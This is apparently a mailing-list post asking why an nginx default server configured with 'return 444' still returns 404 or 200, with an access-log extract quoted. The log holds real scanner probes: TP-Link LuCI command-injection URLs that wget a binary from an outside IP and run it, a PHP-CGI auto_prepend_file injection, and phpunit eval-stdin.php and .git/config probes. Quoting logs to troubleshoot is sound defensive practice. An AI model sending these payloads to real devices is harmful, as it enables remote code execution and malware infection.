Default site configured for 444 returns 404

[Steinar Bang]

Platform: debian 12.6 "bookworm", amd64
          nginx 1.22.1

I have the following in /etc/nginx/sites-available/default:

server {
        listen 80 default_server;
        listen [::]:80 default_server;


        server_name _;

        return 444;
}

This succeeds in some requests using just the IP number returning 444
(which is what I want).

But most of the IP number requests returns 404.

Some IP number requests returns 200 OK.

Does anyone have an idea why?

Here's an extract from the /var/log/nginx/access.log. with requests
using the IPv4 IP number of the server (starts out with a 200, then
comes a couple of 444 (which is what I want), then a couple of 200,
responses, and then some 444 responses, then 200, then 404, then some
444 adresses again until all starts to return 404 (server's IP address
has been replaced by "<server's IPv4 address>"):

94.156.66.116 - - [23/Aug/2024:00:01:50 +0000] "<server's IPv4 address>" "GET / HTTP/1.1" 200 467 "-" "Mozilla/5.0 (Linux; U; Android 1.5; en-us; SPH-M900 Build/CUPCAKE) AppleWebKit/528.5  (ike Gecko) Version/3.1.2 Mobile Safari/525.20.1"                                                                                                                                      
185.224.128.84 - - [23/Aug/2024:00:02:10 +0000] "<server's IPv4 address>" "GET / HTTP/1.1" 444 0 "-" "-"                                                                                       
185.224.128.59 - - [23/Aug/2024:00:36:59 +0000] "<server's IPv4 address>" "GET / HTTP/1.1" 444 0 "-" "-"                                                                                       
162.216.149.127 - - [23/Aug/2024:00:51:03 +0000] "<server's IPv4 address>" "GET / HTTP/1.1" 200 467 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multipleer day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo at paloaltonetworks.com"     
154.213.185.140 - - [23/Aug/2024:01:09:01 +0000] "<server's IPv4 address>" "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%94.156.66.26%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 444 0 "-" "Go-http-client/1.1"                                                                              
185.224.128.83 - - [23/Aug/2024:01:50:28 +0000] "<server's IPv4 address>" "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.18.237t%7Csh%3B%60) HTTP/1.1" 444 0 "-" "Go-http-client/1.1"                                                                                                                                
185.242.226.70 - - [23/Aug/2024:01:55:09 +0000] "<server's IPv4 address>" "GET / HTTP/1.1" 200 467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrom324.190 Safari/537.36"                                                                                                                                                                
172.202.176.134 - - [23/Aug/2024:02:08:27 +0000] "<server's IPv4 address>" "GET /actuator/health HTTP/1.1" 404 125 "-" "Mozilla/5.0 zgrab/0.x"                                                 
199.45.154.128 - - [23/Aug/2024:02:18:44 +0000] "<server's IPv4 address>" "GET / HTTP/1.1" 444 0 "-" "-"                                                                                       
179.43.168.130 - - [23/Aug/2024:02:22:41 +0000] "<server's IPv4 address>" "GET /.git/config HTTP/1.1" 444 0 "-" "Mozilla/4.8 [en] (Windows NT 5.1; U)"                                         
45.148.10.251 - - [23/Aug/2024:02:35:19 +0000] "<server's IPv4 address>" "GET / HTTP/1.1" 444 0 "-" "-"                                                                                        
154.213.185.140 - - [23/Aug/2024:02:41:31 +0000] "<server's IPv4 address>" "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%94.156.66.26%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 444 0 "-" "Go-http-client/1.1"                                                                              
75.119.129.239 - - [23/Aug/2024:02:47:51 +0000] "<server's IPv4 address>" "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 153 "-" "Custom-Asyient"
75.119.129.239 - - [23/Aug/2024:02:47:52 +0000] "<server's IPv4 address>" "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
75.119.129.239 - - [23/Aug/2024:02:47:52 +0000] "<server's IPv4 address>" "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
75.119.129.239 - - [23/Aug/2024:02:47:52 +0000] "<server's IPv4 address>" "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
75.119.129.239 - - [23/Aug/2024:02:47:52 +0000] "<server's IPv4 address>" "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
75.119.129.239 - - [23/Aug/2024:02:47:52 +0000] "<server's IPv4 address>" "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
75.119.129.239 - - [23/Aug/2024:02:47:53 +0000] "<server's IPv4 address>" "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
75.119.129.239 - - [23/Aug/2024:02:47:53 +0000] "<server's IPv4 address>" "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
75.119.129.239 - - [23/Aug/2024:02:47:53 +0000] "<server's IPv4 address>" "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
75.119.129.239 - - [23/Aug/2024:02:47:54 +0000] "<server's IPv4 address>" "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"